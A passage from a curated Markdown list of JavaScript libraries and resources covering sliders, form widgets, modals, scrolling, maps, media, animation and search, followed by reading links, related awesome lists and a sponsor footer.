* [slidr](https://github.com/bchanx/slidr) - add some slide effects.
* [Flickity](https://github.com/metafizzy/flickity) - Touch, responsive, flickable galleries.
* [Glide.js](https://github.com/jedrzejchalubek/glidejs) - Responsive and touch-friendly jQuery slider. It's simple, lightweight and fast.
* [Embla Carousel](https://github.com/davidcetinkaya/embla-carousel) - An extensible low level carousel for the web, written in TypeScript.
## Range Sliders
* [Ion.RangeSlider](https://github.com/IonDen/ion.rangeSlider) - Powerful and easily customizable range slider with many options and skin support.
* [jQRangeSlider](https://github.com/ghusse/jQRangeSlider) - A JavaScript slider selector that supports dates.
* [noUiSlider](https://github.com/leongersen/noUiSlider) - A lightweight, highly customizable range slider without bloat.
* [rangeslider.js](https://github.com/andreruffert/rangeslider.js) - HTML5 input range slider element polyfill.
## Form Widgets
### Input
* [typeahead.js](https://github.com/twitter/typeahead.js) - A fast and fully-featured autocomplete library.
* [tag-it](https://github.com/aehlke/tag-it) - A jQuery UI plugin to handle multi-tag fields as well as tag suggestions/autocomplete.
* [At.js](https://github.com/ichord/At.js) - Add GitHub like mentions autocomplete to your application.
* [Placeholders.js](https://github.com/jamesallardice/Placeholders.js) - A JavaScript polyfill for the HTML5 placeholder attribute.
* [fancyInput](https://github.com/yairEO/fancyInput) - Makes typing in input fields fun with CSS3 effects.
* [jQuery-Tags-Input](https://github.com/xoxco/jQuery-Tags-Input) - Magically convert a simple text input into a cool tag list with this jQuery plugin.
* [vanilla-masker](https://github.com/BankFacil/vanilla-masker) - A pure JavaScript mask input.
* [Ion.CheckRadio](https://github.com/IonDen/ion.checkRadio) - jQuery plugin for styling checkboxes and radio-buttons. With skin support.
* [awesomplete](https://github.com/LeaVerou/awesomplete) - Ultra lightweight, usable, beautiful autocomplete with zero dependencies. - https://projects.verou.me/awesomplete/
### Calendar
* [pickadate.js](https://github.com/amsul/pickadate.js) - The mobile-friendly, responsive, and lightweight jQuery date & time input picker.
* [bootstrap-datepicker](https://github.com/eternicode/bootstrap-datepicker) - A datepicker for @twitter bootstrap forked from Stefan Petre's (of eyecon.ro), improvements by @eternicode.
* [Pikaday](https://github.com/dbushell/Pikaday) - A refreshing JavaScript Datepicker — lightweight, no dependencies, modular CSS.
* [fullcalendar](https://github.com/fullcalendar/fullcalendar) - Full-sized drag & drop event calendar (jQuery plugin).
* [rome](https://github.com/bevacqua/rome) - A customizable date (and time) picker. Dependency free, opt-in UI.
* [Date Range Picker](https://github.com/dangrossman/daterangepicker) - creates a dropdown menu from which a user can select a range of dates.
* [Duet Date Picker](https://github.com/duetds/date-picker) - open source version of Duet Design System’s accessible date picker, WCAG 2.1 accessibility complaint
* [tui.calendar](https://github.com/nhn/tui.calendar) - A JavaScript schedule calendar that is full featured. Now your service just got the customizable calendar.
### Select
* [selectize.js](https://github.com/selectize/selectize.js) - Selectize is the hybrid of a textbox and `<select>` box. It's jQuery based and it has autocomplete and native-feeling keyboard navigation; useful for tagging, contact lists, etc.
* [select2](https://github.com/select2/select2) - a jQuery based replacement for select boxes. It supports searching, remote data sets, and infinite scrolling of results.
* [chosen](https://github.com/harvesthq/chosen) - A library for making long, unwieldy select boxes more friendly.
### File Uploader
* [jQuery-File-Upload](https://github.com/blueimp/jQuery-File-Upload) - File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery.
* [dropzone](https://github.com/enyo/dropzone) - Dropzone is an easy to use drag'n'drop library. It supports image previews and shows nice progress bars.
* [flow.js](https://github.com/flowjs/flow.js) - A JavaScript library providing multiple simultaneous, stable, fault-tolerant and resumable/restartable file uploads via the HTML5 File API.
* [fine-uploader](https://github.com/FineUploader/fine-uploader) - Multiple file upload plugin with progress-bar, drag-and-drop, direct-to-S3 uploading.
* [FileAPI](https://github.com/mailru/FileAPI) - A set of JavaScript tools for working with files. Multiupload, drag'n'drop and chunked file upload. Images: crop, resize and auto orientation by EXIF.
* [plupload](https://github.com/moxiecode/plupload) - A JavaScript API for dealing with file uploads it supports features like multiple file selection, file type filtering, request chunking, client side image scaling and it uses different runtimes to achieve this such as HTML 5, Silverlight and Flash.
* [filepond](https://github.com/pqina/filepond) - A JavaScript library that can upload anything you throw at it, optimizes images for faster uploads, and offers a great, accessible, silky smooth user experience.
### Other
* [form](https://github.com/jquery-form/form) - jQuery Form Plugin.
* [Garlic.js](https://github.com/guillaumepotier/Garlic.js) - Automatically persist your forms' text and select field values locally, until the form is submitted.
* [Countable](https://github.com/RadLikeWhoa/Countable) - A JavaScript function to add live paragraph-, word- and character-counting to an HTML element.
* [card](https://github.com/jessepollak/card) - Make your credit card form better in one line of code.
* [stretchy](https://github.com/LeaVerou/stretchy) - Form element autosizing, the way it should be.
* [analytics](https://github.com/davidwells/analytics) - A lightweight, extendable analytics library designed to work with any third-party analytics provider to track page views, custom events, & identify users.
* [dat.GUI](https://github.com/dataarts/dat.gui) - A lightweight gui controller for changing variables in JavaScript.
## Tips
* [tipsy](https://github.com/jaz303/tipsy) - Facebook-style tooltips plugin for jQuery.
* [opentip](https://github.com/enyo/opentip) - An open source JavaScript tooltip based on the prototype framework.
* [qTip2](https://github.com/qTip2/qTip2) - Pretty powerful tooltips.
* [tooltipster](https://github.com/iamceege/tooltipster) - A jQuery tooltip plugin.
* [simptip](https://github.com/arashmanteghi/simptip) - A simple CSS tooltip made with Sass.
* [toolbar](https://github.com/paulkinzett/toolbar) - A tooltip style toolbar jQuery plugin
* [hint.css](https://github.com/chinchang/hint.css) - A tooltip library in CSS for your lovely websites.
## Modals and Popups
* [Magnific-Popup](https://github.com/dimsemenov/Magnific-Popup) - Light and responsive lightbox script with focus on performance.
* [jquery-popbox](https://github.com/gristmill/jquery-popbox) - jQuery PopBox UI Element.
* [jquery.avgrund.js](https://github.com/voronianski/jquery.avgrund.js) - A jQuery plugin with new modal concept for popups.
* [vex](https://github.com/HubSpot/vex) - A modern dialog library which is highly configurable and easy to style.
* [bootstrap-modal](https://github.com/jschr/bootstrap-modal) - Extends the default Bootstrap Modal class. Responsive, stackable, ajax and more.
* [css-modal](https://github.com/drublic/css-modal) - A modal built out of pure CSS.
* [jquery-popup-overlay](https://github.com/vast-engineering/jquery-popup-overlay) - jQuery plugin for responsive and accessible modal windows and tooltips.
* [SweetAlert](https://github.com/t4t5/sweetalert) - An awesome replacement for JavaScript's alert.
* [SweetAlert2](https://github.com/sweetalert2/sweetalert2) - An awesome replacement for JavaScript's alert.
* [baguetteBox.js](https://github.com/feimosi/baguetteBox.js) - Simple and easy to use lightbox script written in pure JavaScript.
* [colorbox](https://github.com/jackmoore/colorbox) - A light-weight, customizable lightbox plugin for jQuery.
* [fancyBox](https://github.com/fancyapps/fancyBox) - A tool that offers a nice and elegant way to add zooming functionality for images, html content and multi-media on your webpages.
* [swipebox](https://github.com/brutaldesign/swipebox) - A touchable jQuery lightbox
* [jBox](https://github.com/StephanWagner/jBox) - jBox is a powerful and flexible jQuery plugin, taking care of all your popup windows, tooltips, notices and more.
* [lightGallery](https://github.com/sachinchoolur/lightGallery) - A customizable, modular, responsive, lightbox gallery plugin for jQuery.
* [keukenhof](https://github.com/Alexandrshy/keukenhof) - Lightweight, no dependencies, accessibility enabled TypeScript library for creating modal windows.
* [screenfull.js](https://github.com/sindresorhus/screenfull.js) - the JavaScript Fullscreen API, which lets you bring the page or any element into fullscreen. Smoothens out the browser implementation differences, so you don't have to.
## Scroll
* [scrollMonitor](https://github.com/stutrek/scrollMonitor) - A simple and fast API to monitor elements as you scroll.
* [headroom](https://github.com/WickyNilliams/headroom.js) - Give your pages some headroom. Hide your header until you need it.
* [onepage-scroll](https://github.com/peachananr/onepage-scroll) - Create an Apple-like one page scroller website (iPhone 5S website) with One Page Scroll plugin.
* [iscroll](https://github.com/cubiq/iscroll) - iScroll is a high performance, small footprint, dependency free, multi-platform JavaScript scroller.
* [skrollr](https://github.com/Prinzhorn/skrollr) - Stand-alone parallax scrolling library for mobile (Android + iOS) and desktop. No jQuery.
* [parallax](https://github.com/wagerfield/parallax) - Parallax Engine that reacts to the orientation of a smart device.
* [stellar.js](https://github.com/markdalgleish/stellar.js) - Parallax scrolling made easy.
* [plax](https://github.com/cameronmcefee/plax) - jQuery powered parallaxing.
* [jparallax](https://github.com/stephband/jparallax) - jQuery plugin for creating interactive parallax effect.
* [fullPage](https://github.com/alvarotrigo/fullPage.js) - A simple and easy to use plugin to create fullscreen scrolling websites (also known as single page websites).
* [ScrollMenu](https://github.com/s-yadav/ScrollMenu) - A new interface to replace old boring scrollbar.
* [Clusterize.js](https://github.com/NeXTs/Clusterize.js) - Tiny vanilla JS plugin to display large data sets easily.
* [simpleParallax](https://github.com/geosigno/simpleParallax) - Simple and tiny JavaScript library to add parallax animations on any images
* [rellax](https://github.com/dixonandmoe/rellax) - Buttery smooth, super lightweight, vanilla javascript parallax library.
* [asscroll](https://github.com/ashthornton/asscroll) - A hybrid smooth scroll setup that combines the performance gains of virtual scroll with the reliability of native scroll.
* [stroll](https://github.com/hakimel/stroll.js) - A collection of CSS List scroll effects bind to dom through javascript.
* [locomotive-scroll](https://github.com/locomotivemtl/locomotive-scroll) - Detects the elements in viewport and smooth scrolling with parallax.
* [elevator.js](https://github.com/tholman/elevator.js) - Finally, a "back to top" button that behaves like a real elevator.
## Menu
* [jQuery-menu-aim](https://github.com/kamens/jQuery-menu-aim) - jQuery plugin to fire events when user's cursor aims at particular dropdown menu items. For making responsive mega dropdowns like Amazon's.
* [jQuery contextMenu](https://github.com/swisnl/jQuery-contextMenu) - contextMenu manager.
* [Slideout](https://github.com/mango/slideout) - A responsive touch slideout navigation menu for mobile web apps.
* [Slide and swipe](https://github.com/JoanClaret/slide-and-swipe-menu) - A sliding swipe menu that works with touchSwipe library.
* [mmenu](https://github.com/FrDH/jQuery.mmenu) - The best jQuery plugin for app look-alike on- and off-canvas menus with sliding submenus for your website and webapp.
## Table/Grid
* [jTable](https://github.com/hikalkan/jtable) - A jQuery plugin to create AJAX based CRUD tables.
* [DataTables](https://www.datatables.net/) - (jQuery plug-in) It is a highly flexible tool, based upon the foundations of progressive enhancement, and will add advanced interaction controls to any HTML table.
* [Tabulator](http://olifolkerd.github.io/tabulator/) - (jQuery plug-in) An extremely flexible library that create tables with a range of interactive features from any JSON data source or existing HTML table.
* [Bootstrap Table](https://bootstrap-table.com/) - An Extension to the popular Bootstrap framework for creating tables that fit the style of your site with no need for additional markup.
* [floatThead](https://github.com/mkoryak/floatThead) - (jQuery plug-in) lock any table's header while scrolling within the body. Works on any table and requires no custom html or css.
* [Masonry](https://masonry.desandro.com/) - A cascading grid layout library.
* [Packery](https://packery.metafizzy.co/) - A grid layout library that uses a bin-packing algorithm. Useable for draggable layouts.
* [Isotope](https://isotope.metafizzy.co/) - A filterable, sortable, grid layout library. Can implement Masonry, Packery, and other layouts.
* [flexboxgrid](https://github.com/kristoferjoseph/flexboxgrid/) - Grid based on CSS3 flexbox.
## Frameworks
* [Semantic UI](https://semantic-ui.com/) - UI Kit with lots of themes and elements.
* [w2ui](http://w2ui.com/) - A set of jQuery plugins for front-end development of data-driven web applications.
* [fluidity](https://github.com/mrmrs/fluidity) - The worlds smallest fully-responsive css framework.
* [Ink](https://github.com/sapo/Ink) - An HTML5/CSS3 framework used at SAPO for fast and efficient website design and prototyping.
* [DataFormsJS](https://github.com/dataformsjs/dataformsjs) - A minimal JavaScript Framework and standalone components for rapid development of sites and SPA's.
* [EHTML](https://github.com/Guseyn/EHTML) - HTML Framework that allows you not to write JavaScript code.
## Boilerplates
* [html5-boilerplate](https://github.com/h5bp/html5-boilerplate) - A professional front-end template for building fast, robust, and adaptable web apps or sites.
* [mobile-boilerplate](https://github.com/h5bp/mobile-boilerplate) - A front-end template that helps you build fast, modern mobile web apps.
* [webplate](https://github.com/chrishumboldt/webplate) - An awesome front-end framework that lets you stay focused on building your site or app while remaining really easy to use.
* [Cerberus](https://github.com/TedGoas/Cerberus) - A few simple, but solid patterns for responsive HTML emails. Even in Outlook.
* [full-page-intro-and-navigation](https://github.com/CodyHouse/full-page-intro-and-navigation) - An intro page with a full width background image, a bold animated menu and an iOS-like blurred effect behind the navigation.
* [Fluid-Squares](https://github.com/crozynski/Fluid-Squares) - A fluid grid of square units.
* [Mobile-First-RWD](https://github.com/bradfrost/Mobile-First-RWD) - An example of a mobile-first responsive web design.
* [this-is-responsive](https://github.com/bradfrost/this-is-responsive) - This Is Responsive.
* [npm run-scripts](https://gist.github.com/addyosmani/9f10c555e32a8d06ddb0) Task automation with NPM run-scripts.
* [Wasp](https://github.com/wasp-lang/wasp) Wasp is a declarative domain-specific language for developing, building, and deploying modern Javascript full-stack web apps with less code.
## Images
* [Drift](https://github.com/imgix/drift) - Easily add "zoom on hover" functionality to your site's images. Lightweight, no-dependency JavaScript.
* [Magnificent.js](https://github.com/AndersDJohnson/magnificent.js) - Zoom responsively, images & more, w/ jQuery.
* [Panolens.js](https://github.com/pchen66/panolens.js) - Panolens.js is an event-driven and WebGL based panorama viewer. Lightweight and flexible
## Gesture
* [hammer.js](https://github.com/hammerjs/hammer.js) - A JavaScript library for multi-touch gestures.
* [touchemulator](https://github.com/hammerjs/touchemulator) - Emulate touch input on your desktop.
* [Dragula](https://github.com/bevacqua/dragula/) - Drag and drop so simple it hurts.
## Maps
* [Leaflet](https://github.com/Leaflet/Leaflet) - JavaScript library for mobile-friendly interactive maps.
* [Cesium](https://github.com/AnalyticalGraphicsInc/cesium) - Open Source WebGL virtual globe and map engine.
* [gmaps](https://github.com/HPNeo/gmaps) - The easiest way to use Google Maps.
* [polymaps](https://github.com/simplegeo/polymaps) - A free JavaScript library for making dynamic, interactive maps in modern web browsers.
* [kartograph.js](https://github.com/kartograph/kartograph.js) - Open source JavaScript renderer for Kartograph SVG maps.
* [mapbox.js](https://github.com/mapbox/mapbox.js) - Mapbox JavaScript API, a Leaflet Plugin.
* [jqvmap](https://github.com/manifestinteractive/jqvmap) - jQuery Vector Map Library.
* [OpenLayers3](https://openlayers.org/) - A high-performance, feature-packed library for all your mapping needs.
* [H3js](https://github.com/uber/h3) - Hexagonal hierarchical geospatial indexing system ported to javascript by Uber for geospatial visualization.
## Video/Audio
* [prettyembed.js](https://github.com/mike-zarandona/prettyembed.js) - Prettier embeds for your YouTubes - with nice options like high-res preview images, advanced customization of embed options, and optional FitVids support.
* [Play-em JS](https://github.com/adrienjoly/playemjs) - Play'em is a JavaScript component that manages a music/video track queue and plays a sequence of songs by embedding several players in a HTML DIV including Youtube, Soundcloud and Vimeo.
* [polyplayer](https://github.com/Acconut/polyplayer) - Rule YouTube, Soundcloud and Vimeo player with one API.
* [flowplayer](https://github.com/flowplayer/flowplayer) - The HTML5 video player for the web
<https://flowplayer.com/>
* [mediaelement](https://github.com/johndyer/mediaelement) - HTML5 <audio> or <video> player with Flash and Silverlight shims that mimics the HTML5 MediaElement API, enabling a consistent UI in all browsers. <http://www.mediaelementjs.com/>
* [SoundJS](https://github.com/CreateJS/SoundJS) - A library to make working with audio on the web easier. It provides a consistent API for playing audio in different browsers.
* [video.js](https://github.com/videojs/video.js) - Video.js - open source HTML5 & Flash video player.
* [FitVids.js](https://github.com/davatron5000/FitVids.js) - A lightweight, easy-to-use jQuery plugin for fluid width video embeds.
* [Ion.Sound](https://github.com/IonDen/ion.sound) - Simple sounds on any web page.
* [photobooth-js](https://github.com/WolframHempel/photobooth-js) - A widget that allows users to take their avatar pictures on your site.
* [clappr](https://github.com/clappr/clappr) - An extensible media player for the web http://clappr.io
* [exifr](https://github.com/MikeKovarik/exifr) - The fastest and most versatile EXIF reading library. https://mutiny.cz/exifr/
* [ts-audio](https://github.com/EvandroLG/ts-audio) - an agnostic and easy-to-use library to work with the `AudioContext` API.
* [AmplitudeJS](https://521dimensions.com/open-source/amplitudejs) - Open Source HTML5 Web Audio Library. Design your web audio player, the way you want. No dependencies required.
* [ractive-player](https://github.com/ysulyma/ractive-player) - A library for making interactive videos in React.js.
* [ffmpeg.js](https://github.com/Kagami/ffmpeg.js) - FFmpeg optimized for in-browser use: minimal size for faster loading, asm.js, performance tunings, etc.
* [flv.js](https://github.com/bilibili/flv.js) - An HTML5 Flash Video (FLV) Player written in pure JavaScript without Flash.
* [hls.js](https://github.com/video-dev/hls.js) - A JavaScript library that implements an HTTP Live Streaming client. It relies on HTML5 video and MediaSource Extensions for playback.
## Typography
* [FlowType.JS](https://github.com/simplefocus/FlowType.JS) - Web typography at its finest: font-size and line-height based on element width.
* [BigText](https://github.com/zachleat/BigText) - jQuery plugin, calculates the font-size and word-spacing needed to match a line of text to a specific width.
* [circletype](https://github.com/peterhry/circletype) - A jQuery plugin that lets you curve type on the web.
* [slabText](https://github.com/freqDec/slabText/) - A jQuery plugin for producing big, bold & responsive headlines.
* [simple-text-rotator](https://github.com/peachananr/simple-text-rotator) - Add a super simple rotating text to your website with little to no markup.
* [novacancy.js](https://github.com/chuckyglitch/novacancy.js) - Text Neon Golden effect jQuery plug-in.
* [jquery-responsive-text](https://github.com/ghepting/jquery-responsive-text) - Make your text sizing responsive!
* [FitText.js](https://github.com/davatron5000/FitText.js) - A jQuery plugin for inflating web type.
* [Lettering.js](https://github.com/davatron5000/Lettering.js) - A lightweight, easy to use JavaScript `<span>` injector for radical Web Typography.
## Animations
* [velocity](https://github.com/julianshapiro/velocity) - Accelerated JavaScript animation.
* [jquery.transit](https://github.com/rstacruz/jquery.transit) - Super-smooth CSS3 transformations and transitions for jQuery.
* [bounce.js](https://github.com/tictail/bounce.js) - Create tasty CSS3 powered animations in no time.
* [GreenSock-JS](https://github.com/greensock/GreenSock-JS) - High-performance HTML5 animations that work in all major browsers.
* [TransitionEnd](https://github.com/EvandroLG/transitionEnd) - TransitionEnd is an agnostic and cross-browser library to work with transitioned event.
* [Dynamic.js](https://github.com/michaelvillar/dynamics.js) - JavaScript library to create physics-based CSS animations.
* [the-cube](https://github.com/pstadler/the-cube) - The Cube is an experiment with CSS3 transitions.
* [Effeckt.css](https://github.com/h5bp/Effeckt.css) - A Performant Transitions and Animations Library.
* [animate.css](https://github.com/daneden/animate.css) - A cross-browser library of CSS animations. As easy to use as an easy thing.
* [textillate](https://github.com/jschr/textillate) - A simple plugin for CSS3 text animations.
* [move.js](https://github.com/visionmedia/move.js) - CSS3 backed JavaScript animation framework.
* [animatable](https://github.com/LeaVerou/animatable) - One property, two values, endless possibilities.
* [shuffle-images](https://github.com/peachananr/shuffle-images) - The Simplest Way to shuffle through images in a Creative Way.
* [smoothState.js](https://github.com/miguel-perez/smoothState.js) - Unobtrusive page transitions with jQuery.
* [Anime.js](https://animejs.com/) - A JavaScript animation engine.
* [Mo.js](http://mojs.io) - Motion graphics toolbelt for the web.
* [particles.js](https://github.com/VincentGarreau/particles.js) - A lightweight JavaScript library for creating particles.
* [tsParticles](https://github.com/matteobruni/tsparticles) - A new and improved version of particles.js with bug fixes and many new features.
* [particles-bg](https://github.com/lindelof/particles-bg) - A lightweight React particles animation background component.
* [barbajs](https://github.com/barbajs/barba) - It helps you create fluid and smooth transitions between your website's pages.
* [typicaljs](https://github.com/camwiegert/typical) - Animated typing in ~400 bytes 🐡 of JavaScript
* [AutoAnimate](https://auto-animate.formkit.com) - Add motion to your apps with a single line of code.
## Image Processing
* [lena.js](https://github.com/davidsonfellipe/lena.js) - A Library for image processing with filters and util functions.
* [pica](https://github.com/nodeca/pica) - High quality image resize (with fast Lanczos filter, implemented in pure JS).
* [cropper](https://github.com/fengyuanchen/cropper) - A simple jQuery image cropping plugin.
## ES6
* [es6features](https://github.com/lukehoban/es6features) - Overview of ECMAScript 6 features.
* [es6-features](https://github.com/rse/es6-features) - ECMAScript 6: Feature Overview & Comparison.
* [es6-cheatsheet](https://github.com/DrkSephy/es6-cheatsheet) - ES2015 [ES6] cheatsheet containing tips, tricks, best practices and code snippets.
* [ECMAScript 6 compatibility table](http://kangax.github.io/compat-table/es6/) - Compatibility tables for all ECMAScript 6 features on a variety of environments.
* [Babel (Formerly 6to5)](https://github.com/babel/babel) - Turn ES6+ code into vanilla ES5 with no runtime.
* [Traceur compiler](https://github.com/google/traceur-compiler) - ES6 features > ES5. Includes classes, generators, promises, destructuring patterns, default parameters & more.
## Generators
* [Gatsby.js](https://github.com/gatsbyjs/gatsby) - React-based static site generator.
* [Gridsome](https://github.com/gridsome/gridsome) - Vue-powered static site generator.
* [Docusaurus](https://github.com/facebook/docusaurus) - React-based static site generator by Facebook, ideal for content-centric websites.
* [Next.js](https://github.com/vercel/next.js) - React powered static site generator, and they say "All the tools you need to make the Web. Faster.".
## SDK
* [javascript-sdk-design](https://github.com/huei90/javascript-sdk-design) - JavaScript SDK design guide extracted from work and personal experience.
* [Spotify SDK](https://github.com/loverajoel/spotify-sdk) - Entity oriented SDK to work with the Spotify Web API.
* [Square Node.js SDK](https://github.com/square/connect-nodejs-sdk/) - JavaScript client library for payments and other Square APIs.
## Full Text Search
* [lunr](https://github.com/olivernn/lunr.js) - Library for use in the browser and It indexes JSON documents and provides a simple search interface for retrieving documents that best match text queries.
* [flexsearch](https://github.com/nextapps-de/flexsearch) - It is a Next-Generation full text search library for Browser and Node.js.
* [Elasticlunr](https://github.com/weixsong/elasticlunr.js) - This library is based on lunr.js, but more flexible and customized.
## Misc
* [echo](https://github.com/toddmotto/echo) - Lazy-loading images with data-* attributes.
* [picturefill](https://github.com/scottjehl/picturefill) - A responsive image polyfill for <picture>, srcset, sizes.
* [platform.js](https://github.com/bestiejs/platform.js) - A platform detection library that works on nearly all JavaScript platforms.
* [json3](https://github.com/bestiejs/json3) - A modern JSON implementation compatible with nearly all JavaScript platforms.
* [Logical Or Not](https://gabinaureche.com/logicalornot/) - A game about JavaScript specificities.
* [BitSet.js](https://github.com/infusion/BitSet.js) - A JavaScript Bit-Vector implementation.
* [spoiler-alert](https://github.com/joshbuddy/spoiler-alert) - SPOILER ALERT! A happy little jquery plugin to hide spoilers on your site.
* [jquery.vibrate.js](https://github.com/illyism/jquery.vibrate.js) - Vibration API Wrappers
* [list.js](https://github.com/javve/list.js) - Adds search, sort, filters and flexibility to tables, lists and various HTML elements. Built to be invisible and work on existing HTML.
https://listjs.com
* [mixitup](https://github.com/patrickkunka/mixitup) - MixItUp - A Filter & Sort Plugin.
* [grid](https://github.com/hootsuite/grid) - Drag and drop library for two-dimensional, resizable and responsive lists.
* [jquery-match-height](https://github.com/liabru/jquery-match-height) - a responsive equal heights plugin for jQuery.
* [SurveyJS](https://github.com/surveyjs/survey-library) - SurveyJS is a JavaScript Survey and Form Library. https://surveyjs.io/
* [Array Explorer](https://github.com/sdras/array-explorer) and [Object Explorer](https://objectexplorer.netlify.app/) - Resources to help figure out what native JavaScript method would be best to use at any given time.
* [Clipboard.js](https://clipboardjs.com/) - "Copy to clipboard" without Flash or use of Frameworks.
* [ky](https://github.com/sindresorhus/ky) - Tiny and elegant HTTP client based on the browser Fetch API.
* [Fcal](https://github.com/5anthosh/fcal) - Math expression evaluator.
* [emoji-button](https://github.com/joeattardi/emoji-button) - Vanilla JavaScript emoji picker component.
* [iooxa](https://github.com/iooxa/article) - Components for interactive scientific writing, reactive documents and explorable explanations.
* [Idyll](https://github.com/idyll-lang/idyll) - Create explorable explanations and interactive storytelling essays. Can be [embedded in HTML](https://github.com/idyll-lang/idyll-embed).
* [javascript-algorithms](https://github.com/trekhleb/javascript-algorithms) - Algorithms and data structures implemented in JavaScript with explanations and links to further readings.
* [FingerprintJS](https://github.com/fingerprintjs/fingerprintjs) - Makes a visitor identifier from a browser fingerprint that stays the same in incognito mode and when browser data is purged.
* [Peg.js](https://github.com/pegjs/pegjs) - A simple parser generator for JavaScript that produces fast parsers with excellent error reporting. Usable from your browser, from the command line, or via JavaScript API.
* [lune](https://github.com/ryanseys/lune) - Library to calculate the phases of the moon accurately.
* [jsemu](https://github.com/fcambus/jsemu) - A list of emulators written in the JavaScript programming language.
# Worth Reading
* [You Don't Know JS](https://github.com/getify/You-Dont-Know-JS) - Possibly the best book written on modern JavaScript, completely readable online for free, or can be bought to support the author.
* [braziljs/js-the-right-way](https://github.com/braziljs/js-the-right-way/) - An easy-to-read, quick reference for JS best practices, accepted coding standards, and links around the Web.
* [JSbooks](https://github.com/revolunet/JSbooks) - Directory of free JavaScript ebooks.
* [Superhero.js](http://superherojs.com) - A collection of resources about creating, testing and maintaining a large JavaScript code base.
* [SJSJ](https://github.com/KittyGiraudel/SJSJ) - Simplified JavaScript Jargon is a community-driven attempt at explaining the loads of buzzwords making the current JavaScript ecosystem in a few simple words.
* [How to Write an Open Source JavaScript Library](https://github.com/sarbbottam/write-an-open-source-js-lib) - A comprehensive guide through a set of steps to publish a JavaScript open source library.
* [JavaScript Tutorials](https://hackr.io/tutorials/learn-javascript) - Learn Javascript online from a diverse range of user ranked online tutorials.
* [Functional-Light JavaScript](https://github.com/getify/Functional-Light-JS) - Pragmatic, balanced FP in JavaScript.
* [Clean Code JavaScript](https://github.com/ryanmcdermott/clean-code-javascript) - Clean Code concepts adapted for JavaScript.
# Other Awesome Lists
* [sotayamashita/awesome-css](https://github.com/sotayamashita/awesome-css)
* [emijrp/awesome-awesome](https://github.com/emijrp/awesome-awesome)
* [bayandin/awesome-awesomeness](https://github.com/bayandin/awesome-awesomeness)
* [sindresorhus/awesome](https://github.com/sindresorhus/awesome)
* [jnv/list](https://github.com/jnv/lists)
* [gianarb/angularjs](https://github.com/gianarb/awesome-angularjs)
* [peterkokot/awesome-dojo](https://github.com/peterkokot/awesome-dojo)
* [addyosmani/es6-tools](https://github.com/addyosmani/es6-tools)
* [ericdouglas/ES6-Learning](https://github.com/ericdouglas/ES6-Learning)
* [obetomuniz/awesome-webcomponents](https://github.com/obetomuniz/awesome-webcomponents)
* [willianjusten/awesome-svg](https://github.com/willianjusten/awesome-svg)
* [davidsonfellipe/awesome-wpo](https://github.com/davidsonfellipe/awesome-wpo)
* [instanceofpro/awesome-backbone](https://github.com/sadcitizen/awesome-backbone)
* [enaqx/awesome-react](https://github.com/enaqx/awesome-react)
* [bolshchikov/js-must-watch](https://github.com/bolshchikov/js-must-watch)
* [peterkokot/awesome-jquery](https://github.com/peterkokot/awesome-jquery)
* [davidyezsetz/you-might-not-need-jquery-plugins](https://github.com/davidyezsetz/you-might-not-need-jquery-plugins)
* [MaximAbramchuck/awesome-interviews](https://github.com/MaximAbramchuck/awesome-interview-questions)
* [denolib/awesome-deno](https://github.com/denolib/awesome-deno)
* [apvarun/awesome-bun](https://github.com/apvarun/awesome-bun)
# Contributing
Contributions welcome! Read the [contribution guidelines](CONTRIBUTING.md) first.
# License
[![CC0](https://licensebuttons.net/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)
To the extent possible under law, [chencheng](https://github.com/sorrycc) has waived all copyright and related or neighboring rights to this work.
|
<div align="center">
<img width="500" height="350" src="media/logo.svg" alt="Awesome">
<br>
<br>
<hr>
<p>
<p>
<sup>
<a href="https://github.com/sponsors/sindresorhus">My open source work is supported by the community</a>
</sup>
</p>
<sup>Special thanks to:</sup>
<br>
<br>
<a href="https://standardresume.co/tech">
<img src="https://sindresorhus.com/assets/thanks/standard-resume-logo.svg" width="160"/>
</a>
<br>
<br>
<a href="https://retool.com/?utm_campaign=sindresorhus">
<img src="https://sindresorhus.com/assets/thanks/retool-logo.svg" width="210"/>
</a>
<br>
<br>
<a href="https://doppler.com/?utm_campaign=github_repo&utm_medium=referral&utm_content=awesome&utm_source=github">
<div>
<img src="https://dashboard.doppler.com/imgs/logo-long.svg" width="230" alt="Doppler">
</div>
<b>All your environment variables, in one place</b>
<div>
<sub>Stop struggling with scattered API keys, hacking together home-brewed tools,</sub>
<br>
<sup>and avoiding access controls. Keep your team and servers in sync with Doppler.</sup>
</div>
</a>
<br>
<a href="https://workos.com/?utm_campaign=github_repo&utm_medium=referral&utm_content=awesome&utm_source=github">
<div>
<img src="https://sindresorhus.com/assets/thanks/workos-logo-white-bg.svg" width="200" alt="WorkOS">
</div>
<b>Your app, enterprise-ready.</b>
<div>
<sub>Start selling to enterprise customers with just a few lines of code.</sub>
<br>
<sup>Add Single Sign-On (and more) in minutes instead of months.</sup>
</div>
</a>
<br>
<a href="https://strapi.io/?ref=sindresorhus">
<div>
<img src="https://sindresorhus.com/assets/thanks/strapi-logo-white-bg.png" width="200" alt="Strapi">
</div>
<b>Strapi is the leading open-source headless CMS.</b>
<div>
<sup>It’s 100% JavaScript, fully customizable, and developer-first.</sup>
</div>
</a>
<br>
<a href="https://oss.capital">
<div>
<img src="https://sindresorhus.com/assets/thanks/oss-capital-logo-white-bg.svg" width="300" alt="OSS Capital">
</div>
<div>
<sup><b>Founded in 2018, OSS Capital is the first and only venture capital platform focused<br>exclusively on supporting early-stage COSS (commercial open source) startup founders.</b></sup>
</div>
</a>
<br>
<br>
<a href="https://bit.io/?utm_campaign=github_repo&utm_medium=referral&utm_content=awesome&utm_source=github">
<div>
<img src="https://sindresorhus.com/assets/thanks/bitio-logo.svg" width="190" alt="bit.io">
</div>
<b>Instant, shareable cloud PostgreSQL database</b>
<div>
<sup>Import any dataset in seconds, share with anyone with a click, try without signing up</sup>
</div>
</a>
</p>
<hr>
<br>
<br>
<br>
<br>
</div>
<p align="center">
<a href="awesome.md">What is an awesome list?</a>
<a href="contributing.md">Contribution guide</a>
<a href="create-list.md">Creating a list</a>
<a href="https://twitter.com/awesome__re">Twitter</a>
<a href="https://www.redbubble.com/people/sindresorhus/works/30364188-awesome-logo">Stickers & t-shirts</a>
</p>
<br>
<div align="center">
<b>Follow the <a href="https://twitter.com/awesome__re">Awesome Twitter account</a> for updates on new list additions.</b>
</div>
<br>
<p align="center">
